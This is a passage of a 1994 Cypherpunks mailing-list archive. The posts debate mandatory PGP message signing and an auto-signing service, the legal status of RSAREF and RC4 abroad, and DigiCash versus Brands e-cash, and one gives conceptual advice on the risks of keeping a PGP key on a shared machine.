speak at an event similar to the one I took the transcript from, and see if they'd be willing to televise it. My feeling is that if we can get the word out to the public at large, we're going to win. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt7LBhEpP7+baaPtAQF65AP+OAL3xt66v55U4Spd/5PenHYaRzs1v/vy P7HyVRI8RjH1Y+nR1cpLRYz+uilSrK9Fk1ew4Qhfja0RNh91kVe2aVHmw7dIxWHv rhFv569LFMQWj73JawdtePaXver+6deWhc8d1VL/PkgXgk5feg6mDEjRUB1GsjgZ FfkoHvrEBQA= =cHR2 -----END PGP SIGNATURE----- From tcmay at netcom.com Thu Dec 1 23:26:42 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 23:26:42 PST Subject: Tim May is RIGHT!!! In-Reply-To: <199412020705.XAA07308@zero.c2.org> Message-ID: <199412020727.XAA16893@netcom7.netcom.com> (Not Very) Anonymous User wrote: > I'm sorry I can't say so under my real name, but I > *vehemently agree* with Tim May about the authoritarian, > heavy handed, generally outrageous egotism of Eric > Hughes of recent. This is REALLY UPSETTING. Eric should > be ASHAMED OF HIMSELF for strutting around like a > peacock. he is EMBODYING THE DICTATORIAL APPROACH HE > CLAIMS TO DEFY VIA CYPHERPUNK PHILOSOPHY. this is > truly the most HYPOCRITICAL AND EGOMANIACAL action I > have seen by anyone in recent times on this list. Note that I have made no such claims. While I don't like the sound of the proposal, for various reasons, and while I didn't care for the "If Eric says it is so, then it is so" sycophancy, I can't find any evidence that Eric was strutting around like a peacock, etc. > Tim May will leave the list? GOOD FOR YOU, TIM. Get > the hell out of here. Eric Hughes may have had some This is unlikely, as it sounds like the worst-case version of the proposal has been shelved. I happen to think that this "flame war," as some have characterizied it, has made more apparent the difficulties many on the list (perhaps most, as the Silent Majority is probably not in a better position, it seems to me) have in routinely signing posts. I like the "under oath" points Mike Duvos made today. Rishab suggested we should talk about other things. Well, nothing is stopping folks from doint so. I take the heated debate about this "sign or else" to be a sign of health; at least some topics can still generate furious debate. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From sglass at netcom.com Thu Dec 1 23:31:43 1994 From: sglass at netcom.com (sglass at netcom.com) Date: Thu, 1 Dec 94 23:31:43 PST Subject: cypherpunk signing service Message-ID: <199412020736.CAA10394@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Operating System: SunOS 4.1.3_U1 Site: netcom12 X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1021 Todd... | The cypherpunks at hks.net service is now available. | | It will sign any message sent to cypherpunks at hks.net with its (currently | 384 bit) key and forward the signed message to cypherpunks at toad.com. Does this look right? pub 384/27D5B76D 1994/12/01 Cypherpunk signing agent Key fingerprint = 85 BA D4 6D B8 9D B6 B7 EB 74 11 48 42 45 61 F2 | I welcome any suggestions on the format of the message and the prepended | message. Why not stealth it and just appear as if the sender signed it? | I've made a couple of changes to the format of outgoing messages that | should hopefully make life easier for readers. Thanks, Todd! | The most noticable will be the movement of the blurb, but also very | significant is the removal of the "Reply-To: " (feh on the proliferation | of MUA behaviors) header, and way down on the "noticable" list is an | "Errors-To: " and a "Sender: " header. Lookin' good. | Thanks for y'all's comments: keep 'em coming. Good work. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt7OeioZzwIn1bdtAQGndwF+JJkJwvNKoSw16//vyK7nbNfxeUxGG3ar 9Ek87KCkqlg+QKbwGcCisaV1PJcu+Lns =vnS5 -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From tcmay at netcom.com Thu Dec 1 23:32:28 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 23:32:28 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412012144.NAA13805@largo.remailer.net> Message-ID: <199412020732.XAA17397@netcom7.netcom.com> Eric Hughes wrote: > > I'd feel just about as strange (I hope) if people were saying "Look, > Tim's the boss. He's the Big Kahuna. If you don't like his policies on > his list, leave." > > "This is one _tasty_ burger" Something to do with the metric system? -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From jamesd at netcom.com Thu Dec 1 23:35:33 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 1 Dec 94 23:35:33 PST Subject: using us crypto sw outside usa In-Reply-To: <199412020051.BAA13040@cmir.arnes.si> Message-ID: <199412020735.XAA05139@netcom3.netcom.com> Tomaz Borstnar writes > > Hello! > > I was wondering what is the legal status for using rsaref ooutside usa. > Is it legal or not? Exporting it, as for example when you ftp it off a site in the US is illegal. Illegal in the US that is. Of course if you are not in the US, you probably do not give a shit. And if you are in the US, then you are not exporting it. This law was written for gun runners, not crypto exports. > > Also, what is the legal status of RC4 code posted to the net? Lawyers will come armed with scalpels and will surgically remove this information from your brain if you reveal that you know it. (just kidding.) But seriously folks, it was a trade secret, and therefore if you were the guy who blew it then you are in serious trouble :-) Of course anybody can sue anyone for anything (in America) but I am happy to report that American lawyers are profoundly reluctant to sue in overseas courts. And even if the American courts could get at you, they do not have a leg to stand on. (Of course that has not stopped them in the past.) -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From wcs at anchor.ho.att.com Thu Dec 1 23:39:35 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 1 Dec 94 23:39:35 PST Subject: Authentication at toad.com: WTF? Message-ID: <9412010625.AA17536@anchor.ho.att.com> -----BEGIN PGP SIGNED MATERIAL----- > On Wed, 30 Nov 1994, The new cypherpunks signature checking agent wrote: > > The below message was found to have a valid signature from "JEFF LICQUIA (CEI) > > " JLICQUIA at mhc.uiuc.edu. Apparently it was a spoof, but whatever. I'd be really bugged by the security implications of software claiming to have validated signatures; software that complains about bogus sigs is fine, since if it's spoofed it's only a warning, and if the warnings are deleted your trust is still somewhat limited unless you've verified the signatures yourself. Trusting someone else's verification is less than ideal security policy :-) Bill -----BEGIN PGP SIGNATURE----- Pgp-version: 32767 uhohovhoehvohfvoihvhoviheoivhefoivhefohvefohv jhjhohhuhvuhiuhewiuvhiuhfveiuhefviuhevhevhvhh -----END PGP SIGNATURE----- Cypherpunks signature checking agent: It's valid - trust me! From laceyala at student.msu.edu Thu Dec 1 23:55:16 1994 From: laceyala at student.msu.edu (Alan J Lacey) Date: Thu, 1 Dec 94 23:55:16 PST Subject: hello Message-ID: <9412020754.AA50275@student1.cl.msu.edu> send me your zine pleas From nobody at c2.org Fri Dec 2 00:06:45 1994 From: nobody at c2.org (Anonymous User) Date: Fri, 2 Dec 94 00:06:45 PST Subject: Larry is at it again, and is flaming old Eric now. Message-ID: <199412020805.AAA07598@zero.c2.org> [BIG flamo at Eric deleted... it ain't worth printing] To keep Larry from forging in my name, I am going to fight fire with fire, and am going to anon post this. Dude, what did Eric Hughes do to you to get you so rabid? As soon as you were found out, you started drooling. Ask your local vet school for your first series of rabies shots... you NEED them. Eric Hughes spends his time and money for support of this list. Do you? Probably not. If he wants signatures, ITS HIS DAMN LIST. Enough of flaming at you, buddy. You are too wasted to hear anything but your typing and drool dropping to the floor as you try to spam this list again. About two months ago, Tim May bitched about the coming of a ton of dillweeds on the Net. Guess I agree on this point with him. LD, there is something called Electro Convulsive Therapy. It does a good job of helping cases that would otherwise be too far gone for medicine. Take a good look at getting treatment. It seems you need it. -- A lurker who does not like the maintainer of this list getting treated like crap for trying something new. From frissell at panix.com Fri Dec 2 02:02:42 1994 From: frissell at panix.com (Duncan Frissell) Date: Fri, 2 Dec 94 02:02:42 PST Subject: NYT Potpurri and Econo-cash Message-ID: <199412021001.AA27082@panix.com> >"And flirting with heresy, Mr. Spindler says he sees no need >for the so-called information superhighway. And 500 channels? >Sixty are plenty. 'This is not going to be an all-electronic Pretty stupid considering that the non-interactive 150 channel RCA/Hughes DBS system is one of the hottest sellers of this holiday season. DCF From wolfgang at wi.WHU-Koblenz.de Fri Dec 2 02:05:33 1994 From: wolfgang at wi.WHU-Koblenz.de (Wolfgang Roeckelein) Date: Fri, 2 Dec 94 02:05:33 PST Subject: Brands excluded from digicash beta Message-ID: <9412021004.AA03854@sirius.wi.WHU-Koblenz.de> Hi, paul at poboy.b17c.ingr.com (Paul Robichaux) wrote: >The more I deal with Digicash, the better First Virtual looks. My technical >preference is for using Brands or Chaum cash; at present, though, there aren't >any shipping Brands servers, and the Digicash folks don't seem to be able to >get all their socks in one bag. Does anybody know how the chaum patents (I think they claimed somewhere that they had applied for some) affect Brands system? Wolfgang --- Dipl.-Wirtsch.-Inf. Voice: +49 261 6509 173 Wolfgang Roeckelein Fax: +49 261 6509 179 WHU Koblenz E-Mail: roeckelein at wi.whu-koblenz.de Burgplatz 2 (NeXTmail ok) D-56179 Vallendar Germany From adam.philipp at ties.org Fri Dec 2 02:30:14 1994 From: adam.philipp at ties.org (adam.philipp at ties.org) Date: Fri, 2 Dec 94 02:30:14 PST Subject: using us crypto sw outside usa Message-ID: <199412021035.FAA11778@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- >I was wondering what is the legal status for using rsaref outside usa. >Is it legal or not? Depends on whether RSA has a patent in that country... I know of no countries besides the U.S.A. that have a patent on RSA. Using exact code may also violate copyright...that is a tougher matter to prove...but copyright treaties allow some level of international protection...use with care. >Also, what is the legal status of RC4 code posted to the net? It was a trade secret. It is no longer...Copyright issues still are still a problem, but ask an attorney in your country if you are going to use it in a commercial program. Adam Philipp - -- PGP Key available on the keyservers. Encrypted E-mail welcome. SUB ROSA: Confidential, secret, not for publication. -Black's Law Dictionary GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++-- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt74TCoZzwIn1bdtAQGrwgF/WOBO0J7eZDmrYd+TrirztXE+0DPG7ODN Gj8VMHuFpWEh92FV1/wkcOlBTQ7bfxtH =DdWH -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From John.Schofield at sprawl.expressnet.org Fri Dec 2 04:11:26 1994 From: John.Schofield at sprawl.expressnet.org (John Schofield) Date: Fri, 2 Dec 94 04:11:26 PST Subject: The thread that would not die. (Mandating signatures) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- It is silly to talk of someone "owning" the list. The list is a community. The only possible owners are the people in the community. If we all left, Eric would still have control over the list--but the list would be worthless. It is just as silly, though, to talk about whether or not Eric has the "right" to enforce his ideas. He *CAN* make changes to the list--anything else is irrelevant. This whole discussion seems to be based on the idea that signing everything is a Good Thing. Yet I haven't seen a convincing argument for that. If I read a forged message, I haven't been hurt. If the person being impersonated doesn't exist, nobody has been harmed--and if he does, ONLY that person has been harmed. So, let's put the onus here where it belongs. If people feel their reputations are important enough that they need to sign their messages, more power to them. If they don't feel it is important, who are you to tell them the value of THEIR reputations? When signatures are easy enough to do, the scale will balance on the side of security--people will value their reputations more than the trouble it takes to sign messages. Until then, people will not sign. For me, signing is easy--even though I am ridiculously unconnected right now. So I do it, using an off-line mail-reader shell that I wrote and distributed myself. The list members who are convinced that digital signatures are valuable could do much more to advance their cause by eliminating some of the barriers to using digital signatures than by mandating them. Any type of a stick will not work very well in this situation. The people most interested in privacy and encryption are those who are by nature most individualistic and stubborn. Forcing them to do something will make most of them go the other way, or go away. I know my mind works that way. -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Call 818-345-8640 voice for info on Keep Out magazine. iQCVAwUBLt6x1Wj9fvT+ukJdAQGKcAP/TqIF6b8UEo6IWV93JdktGoYSxQ5w6wKw MR3tXicSCRI1S/tSOSqcZm45M9CExKz7W4z417Ip8iP/wzjEmAb+s0ObgRoxoHPL Xe+VFSYq6o7f5XT67eBr+lK6t+pknmkc626Z86LsjqKIZ5jBLZrpKzmOP+La2Ypv /uE1/ZckzbA= =G1kK -----END PGP SIGNATURE----- **EZ-PGP v1.07 --- Blue Wave/RA v2.12 -- |Expressnet: John Schofield 11:310/12 |Internet: John.Schofield at sprawl.expressnet.org | | Standard disclaimer: The views of this user are strictly his own. From mccoy at io.com Fri Dec 2 05:11:54 1994 From: mccoy at io.com (Jim McCoy) Date: Fri, 2 Dec 94 05:11:54 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021004.AA03854@sirius.wi.WHU-Koblenz.de> Message-ID: <199412021311.HAA10131@pentagon.io.com> Wolfgang Roeckelein writes: > > Does anybody know how the chaum patents (I think they claimed somewhere > that they had applied for some) affect Brands system? Chaum has several patents relating to digital cash, the core one being a patent on the blind signature methods commonly in use. When I last heard an update on the Chaum/Brand saga it was that Brand believed his system avoided Chaum's patents while Chaum "had not yet been convinced that this was so, but it was a possibility." jim From grendel at netaxs.com Fri Dec 2 05:28:33 1994 From: grendel at netaxs.com (Michael Handler) Date: Fri, 2 Dec 94 05:28:33 PST Subject: GATT and crypto? (Was: Re: using us crypto sw outside usa) In-Reply-To: <199412021035.FAA11778@bb.hks.net> Message-ID: On Fri, 2 Dec 1994 adam.philipp at ties.org wrote: > >I was wondering what is the legal status for using rsaref outside usa. > >Is it legal or not? > > Depends on whether RSA has a patent in that country... I know of no > countries besides the U.S.A. that have a patent on RSA. Using exact code may > also violate copyright...that is a tougher matter to prove...but copyright > treaties allow some level of international protection...use with care. Anyone know how GATT would affect this, if passed? ABC News ran a short blurb a few nights ago about how it contained intellectual property provisions, and that patents would be honored worldwide. (?) What effect would this have on the distribution of PGP, and other software that uses RSAREF? -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator You're only as elegant as your actions let you be From rah at shipwright.com Fri Dec 2 05:34:29 1994 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 2 Dec 94 05:34:29 PST Subject: Scalability of Ecash System / Article on Internet Cash available. Message-ID: <199412021333.IAA14380@zork.tiac.net> Filched from buyinfo, where they've been talking a lot about e$ lately... >From: brands at cwi.nl >Original-From: Stefan.Brands at cwi.nl >Subject: Re: Scalability of Ecash System / Article on Internet Cash available. >To: www-buyinfo at allegra.att.com >Date: Thu, 1 Dec 1994 16:12:50 +0100 (MET) >Cc: hfinney at shell.portal.com >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >X-UIDL: 786299434.063 > >I noticed that the discussion is currently about the e-cash system of >DigiCash. Some good issues have been raised in the discussion, and I >would like to comment in detail about my own opinion in these matters. >As it so happens, I recently wrote an article that addresses in detail >each of the raised concerns, and for this reason it seemed easiest to >simply make this article available by ftp. So I did. The paper is >entitled "Electronic Cash on the Internet," and will appear in the >Proceedings of the Internet Society 1995 Symposium on Network and >Distributed System Security, San Diego, California, Februari 16-17, >1995. To retrieve it: log in anonymously at ftp.cwi.nl, and go to the >directory pub/brands. There you will find the paper, in both dvi and >PostScript format (and Unix-compressed formats). The paper contains >several drawings; if you want to have the complete paper, including >the pictures, then you *must* retrieve the PostScript version. I made >a particular effort to explain the concepts behind the system (many of >which are due to Chaum); see Section 3, it is about five pages with no >math. > > Short abstract of the paper: It is generally realized that the Internet > will not be able to offer full-fledged electronic marketplace > capabilities without a suitable electronic mechanism for processing > payments. The electronic payment mechanism that is presented offers a > variety of features that are believed to be particularly appealing in > this respect. > > To participate, an Internet user must interface to his computer a > tamper-resistant device with an ordinary 8-bit microprocessor, > typically a PCMCIA card, and install some software. Internet service > providers do not need special hardware. Payments can be made > completely *off-line*, and are untraceable and unlinkable. > Multi-party security is guaranteed without parties having to trust > other parties. Transaction processing speeds are such that even > modestly equipped computers will be able to meet the performance > levels required by demanding Internet payment applications. One > particularly interesting such application is click-and-pay ability > when travelling World-Wide-Web links. > >The presented approach may seem to be less attractive than many other >proposals, because it requires tamper-resistant hardware for the >users. In the longer run, though, when the use of e.g. smart cards for >electronic payments has become commonplace, the advantages in my >opinion will significantly outweigh this objection. What will remain >are the advantages: click-and-pay ability to make instantaneous >off-line payments, the ability to cost-effectively serve tens of >millions of participants, the ability to guarantee one's own privacy, >multi-party security, support for different currencies, and >portability of tamper-resistant devices to other payment platforms. > > >Some brief comments on the current discussion: > >--- Michael E. Peirce (mepeirce at alf2.tcd.ie) wrote: > >I've been looking at the Ecash payment system and was wondering about > >the problem of scalability if it were to become popular. > >(For anyone who doesn't already know, Ecash is an electronic cash > >solution, details of which can be found at http://www.digicash.com ) > >It seems to me that, while their bank (bank.digicash.com) will be able > >to handle the 10,000 odd users in the trial, how would it cope with the > >possibly thousands of transactions that might take place all over the > >Internet, every minute, if the system were to become popular? > >Every transaction requires that the merchant shop, connect to the bank > >to validate the customers coins, right? > >With a popular Ecash system, the bank would be swamped, or what if even > >the link to the bank went down for a few days? > > Hal (hfinney at shell.portal.com) wrote: > >There has to be a single common database which all the banks share in > >order to detect double spending. Otherwise I could spend the same coin > >multiple times, going to a different bank each time. Granted, shared > >databases can work, but if a machine which holds part of the database goes > >down it will take special engineering to keep things consistent and > >available. > >There are two different senses in which we can speak of multiple banks. > >One is a setup where all the banks share the same type of cash, where > >they are logically a single bank but distributed to try to get increases > >in reliability. This has the database consistency and access problems I > >described above, which modern-day bank systems don't have to the same > >extent. > > I fully agree with these comments. Btw, it is correct that the e-cash > system of DigiCash is an *on-line* *coin* system. It is interesting to > take a look at their faq, at > http://www.digicash.com/ecashinfo/ecash-faq.html, item > "Does ecash really have to be online?". There is sais: "Actually, no. [...] > We'll add some more functionality in that area as soon as the on-line > system is completely operational." Furthermore, in item "If I copy my > money, can I spend it twice," it sais: "In an off-line > situation (future) ..." From these comments of DigiCash, it seems that > they very well realize the problems associated with on-line verification > when the system is used on a large scale, and that they hope to implement > an off-line system in the future. However, a problem with this might be > the following, as noted by Jim McCoy (mccoy at io.com): > >[first part] > >A digital money system can do that, but the current version of Chaum's > >system does not. The disadvantage of a system that does this > >self-identification of double-spenders is that it front-loads the cost of > >the identification protocol into everyone's withdrawls and purchases; they > >must use a cut-and-choose system during withdrawl to make sure that the > >coins presented for blinding are in the proper format and must perform an > >additional protocol negotiation during purchases. > >[...] The overhead involved in the necessary machinations to make sure > >that a malicious cheater did not send in bogus coins that mis-identified > >him increases the transaction cost of such a system significantly. It also > >increases the transaction cost of purchases by requiring the merchant and > >purchaser to perform an additional transaction to reveal halves of the > >identity bits after each purchase. > >[second part] > >It is an interesting version of the > >digital coin protocols, but one that is unlikely to be used in the > >immediate future due to the increased costs it places upon the system. It > >is likely that such a system will first appear in smartcard digital cash > >systems where dedicated hardware can cut down on the increased costs. > > The first part is correct, the overhead caused by the cut-and-choose > withdrawal protocols seems unacceptable. Another problem, which > certainly should not be forgotten, is that is can hardly be said to be > sufficient if only traceability of double-spenders after the fact is > offered. It is clearly desirable that there is prior restraint of > double-spending, and ideally the traceability ater the fact should still > be present (as a second line of defense). Now, doing off-line cash with > prior restraint of double-spending, *and* privacy of payments, seems to > result in extremely inefficient systems when one uses the cut-and-choose > technique of Chaum/Fiat/Naor (just try it, and you'll see what I mean...). > Probably these are the main reasons why DigiCash has not implemented an > off-line system. (Yet a third problem is that it is really cumbersome > to use a coin system if each coin is several kilo-bytes...) > > This is not to say that efficient privacy-protecting off-line cash systems > with prior restraint of double-spending do not exist. The system that I > present in my paper mentioned above meets all these criteria. The > reason for this is that I do *not* use a cut-and-choose withdrawal protocol. > As those of you who have tried to design off-line systems will > know, the design in fact consists of two protocols, one for paying and one > for withdrawal; designing the withdrawal protocol is by far the > hardest task (which is still an understatement...). The > technique that I use for my withdrawal protocols is a new one, called > restrictive blinding, and the only one known thus far that can provide > efficient withdrawal protocols. Curiously enough, most of the withdrawal > protocols that result from this technique are *not* ordinary blind > signature protocols as defined in > literature (because only the signature is blinded---the message is not!). > The withdrawal protocol in my Internet paper is a blind signature protocol, > but for instance the withdrawal protocol that I used in my technical > report (reference 5 in the paper) is not. > >-- Hal (hfinney at shell.portal.com) wrote: > >I wish I could. I have applied several times for the beta test at > >digicash, starting almost three months ago. Finally I got a reply at the > >beginning of November saying that I would be hearing from them in a few > >days. Since then, nothing. I wonder if people are actually being > >allowed to join the beta trial as are implied by all of these web pages? > >I would like to see a more honest explanation of the chances of being > >able to experience ecash than the simple "click here to try it out" you see > >everywhere. > > I had exactly the same experience; I sent in the registration several > months ago. I'm still waiting for my account, which was announced to me at > the beginning of this month. > > >Stefan Brands, >------------------------------------------------------ >CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands >Tel: +31 20 5924103, e-mail: brands at cwi.nl > > > > > > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From sommerfeld at orchard.medford.ma.us Fri Dec 2 05:47:55 1994 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Fri, 2 Dec 94 05:47:55 PST Subject: FBI INVESTIGATING BLACKNET In-Reply-To: <199412020516.XAA06790@jpunix.com> Message-ID: <199412021343.IAA00377@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- I also heard that the FBI was investigating Blacknet, and had asked questions of someone quite a bit more reliable than Mr. Detweiler. Apparantly someone didn't `get the joke' when Detweiler spammed the world, called the FBI, and the FBI didn't get it either. Your Tax Dollars At Work. (BTW, the recent flamage about encouraging digitally signed messages to cypherpunks prodded me into doing something I had been meaning to do for a while: when I go to send mail in emacs, it prompts me if I want to sign or encrypt the outgoing message. It's a 10 minute hack for anyone who knows emacs lisp, but it's something good which has come out of the flame war...) - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt8kfbT+rHlVUGpxAQEBoQP/WshdqiYfn33ywuXaqQLzOyD3Ysb5f9rg 0bMbb9Yv2gw08gRiJJ15AhXPuJUaGDB4Uh4XIXfnatCajbPEQxH1PP1h+m9w1+CC dPV4rPK32Ei1mxrVwzqIUKtZeHNangHDOmTZUzDVpiAwinoKCh2m+rlcfVfhOtvq kpmsIDGySg4= =V68y -----END PGP SIGNATURE----- From paul at digicash.com Fri Dec 2 06:05:04 1994 From: paul at digicash.com (Paul Dinnissen) Date: Fri, 2 Dec 94 06:05:04 PST Subject: Brands excluded from digicash beta Message-ID: <199412021404.PAA18209@digicash.com> Hi, We're sorry to hear any complaints about the handling of any requests for information regarding ecash. As you can understand, we are certaintly not planning to create unsatisied ecash users at the very start of the ecash endeavour. So at least we are happy to hear from you so we can act appropriately. DigiCash has the ambitious goal to make the ecash client software available on virtually every OS platform and/or system. Alas, our programmers crew is not that extensive that we're able to release everything at once, we has to resort to a phased release approach. For some insight in the release history of the sundry ecash versions, we refer to our WEB server pages. With this background we answer your questions and remarks, at the hand of some of quote orginating form your mail to DigiCash. > Hal said: > > I just figured that I didn't have enough clout for them to bother to > > respond to me, but today on the www-buyinfo list, Stefan Brands, who > > many think has the best ecash technology available today, posted that he > > had had the same experience! Brands himself has still not been given > > an opportunity to join the beta test. He did not sound very happy about > > this. As announced, the ecash-trial starts in phases. Currently we are completing most versions of ecash. We receive quite a lot of good feedback from the first releases. Therefore we decided to change the user-interface to get better software that is easier to use, before confronting the user of the next releases with problems already solved! We decided to first to select tester from our own timezone to facilitate easy voice communication in case extensive support issues. Contrary to our expectations we encountered relatively few problems, so we can soon release also the beta-test to tester in the remaining time zones. So as you can see our release policy is not that staight forward and involves a lot of considerations like usability and acceptance. This is one of the main reasons why Mr. S. Brands HAS received his beta-test version friday the 11th of November, together with all his collegues at the CWI. They all run Silicon Graphics International OS and before that date this version wasn't finished. > I was in the same boat-- I sent in several requests, all of which were > ignored. After Digicash issued a call for prototype shops, I signed > up. WHAM. I immediately started getting mail asking when I'd have my > shop ready-- sometimes two or three messages a day. > > Once I got everything up and running, I didn't hear further from them. Sometimes we can react very fast, but alas this is only the case for standard procedures which we did automate. More specific questions and requests *have* to be handled by humans. We think the people who are willing to invest quite some effort in setting up a shop for the beta test, are very important participants in the beta test trail. Therefore it seems *very* unlike to us that we didn't respond to *any* mail or request from you. Not trusting our own memory ( we do receive more than 100 (yes, hundred) mails on ecash *each* day, even Sundays) we dove right in to it and found a trail of DigiCash answers to your mail with the subject: 'Concerns about ecash'. > Since then, an accident on my WWW server has rendered the e-shop > inoperable. I've asked Digicash, in the form of Paul Diniessen, for > help reconstructing the bank records. No go. Sorry we *did* sent you a respons within an hour from your request by my colleague Branko. He is responsible for our bank in the trial. His respons was: -The dbm library used by Linux and FreeBSD are different, so the ecash -databases are also incompatible. If you have a password for getting an -initial balance, you can also use this password for reopening your -account (and keeping your old balance). For the server at fairgate.com -account you can use the password ******** (pw made invisible PD) for this. - -Branko > > Of course, it may well be a matter of incompetence rather than insult, > > but the net result is the same. The more I see of digicash's lack of > > consideration towards their potential customers and important figures like > > Brands the more I question whether they have the potential to succeed. > > The more I deal with Digicash, the better First Virtual looks. My > technical preference is for using Brands or Chaum cash; at present, > though, there aren't any shipping Brands servers, and the Digicash > folks don't seem to be able to get all their socks in one bag. We feel somewhat troubled by these comments. We strongly feel that the alleged 'lack of consideration' as unjustified. First we would like to split up your comment in to two different issues, first regarding our potential customers and secondly the issue of Mr. S. Brands. As we mentioned before we deem *all* our users, in the past, now, and in the future, as important whether it concerns "shops" or mere "customers" they all contribute to a successful new payment medium. We like you to consider this phase in the existence of ecash as a genuin beta trail. In beta test not only software is being trailed but the supporting services too! However, it should be noted that we did respond to your mail and requests. On the issue on Mr. S. Brands. As we explained before no way we even considered to exclude Mr. Brands for the beta test. As of the technical appreciation of the Chaum system as opposed to the Brands system and the alleged scalability issues , we propose you contact Mr. S. Brands and Mr. D. Chaum for details. We will give a call today to check if received this mail. We hope to resolve the problems mentioned above and to continue our co-operation. Kindest regards, Paul Dinnissen DigiCash bv. From dmandl at bear.com Fri Dec 2 06:09:31 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Fri, 2 Dec 94 06:09:31 PST Subject: Cypherpunks@hks.net service Message-ID: <9412021408.AA21731@yeti.bsnet> > From: cactus at bb.hks.net > > The cypherpunks at hks.net service is now available. > > It will sign any message sent to cypherpunks at hks.net with its (currently > 384 bit) key and forward the signed message to cypherpunks at toad.com. No offense, but what's the point? What's next, automated key-signing services? Is this just intended to help people who can't sign easily to get around Eric's proposed requirement? If so, it seems like almost an embarrassment--someone setting up a meaningless message signer to spoof the cypherpunk server, which it does easily. Doesn't sound too good to me. --Dave. From collsc at snowbird.aud.alcatel.com Fri Dec 2 06:17:26 1994 From: collsc at snowbird.aud.alcatel.com (collsc at snowbird.aud.alcatel.com) Date: Fri, 2 Dec 94 06:17:26 PST Subject: public accounts / PGP / passphrases Message-ID: <199412021422.JAA13606@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > From owner-cypherpunks at toad.com Thu Dec 1 20:25:31 1994 > Date: Thu, 1 Dec 1994 21:18:55 -0500 > Subject: public accounts / PGP / passphrases > To: cypherpunks at toad.com > From: lmccarth at ducie.cs.umass.edu > X-Server-Version: Cactus-Serv 1.1 > Reply-To: cypherpunks at bb.hks.net > Sender: owner-cypherpunks at toad.com > Content-Length: 1705 > Rather than assume that the "Reply-To:" field shown above is appropriate, I have Cc'ed your originating address as well. So, if you get two copies of this, you'll know why. > > Could someone please elaborate on the foolishness of using PGP with a > passphrase on a public machine (as I do) ? Am I wrong in thinking that my > secret key is useless to an intruder until she guesses my passphrase ? I > have no net access except via an account on a public machine, so I'm not > about to start storing my secret key elsewhere, but I'll change my passphrase > to if it's irrelevant anyway. I just reviewed the PGP docs a bit and > Phil says "Nobody can use your secret key file without this pass phrase.", > which seems to contradict what many people on the list have said. > Postulate an unscrupulous sysadmin (or anyone who manages to get the password for 'root' via fair means or foul). Let's call him Charlie (since we know that neither Alice nor Bob would do such a thing :). Charlie could easily install a process which logs each keystroke you enter, thus capturing your passphrase in said log. Alternately, he could substitute a rogue version of PGP for the real version. This rogue version would function exactly like the real version (to avoid suspicion on your part), but would surreptitiously copy your secret key and passphrase into a log file. Admittedly, this kind of attack is far-fetched. As long as you are aware of the possibility, you are free to assess the likelihood of such an attack and proceed accordingly. - -- Scott Collins "Now, thanks to the computer revolution, many Alcatel Network Systems geeks make ten times as much money as you do." Richardson, Texas Canter & Siegel, the Green Card Lawyers -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt8tgyoZzwIn1bdtAQFxDAF/Vu1A4jQ5R0hW2OODcMMPCjeCFZG0aRvB OJDeQZi5hBGAVjVk2QOeCZR//zWvp1lC =Rpnk -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From eric at remailer.net Fri Dec 2 07:11:10 1994 From: eric at remailer.net (Eric Hughes) Date: 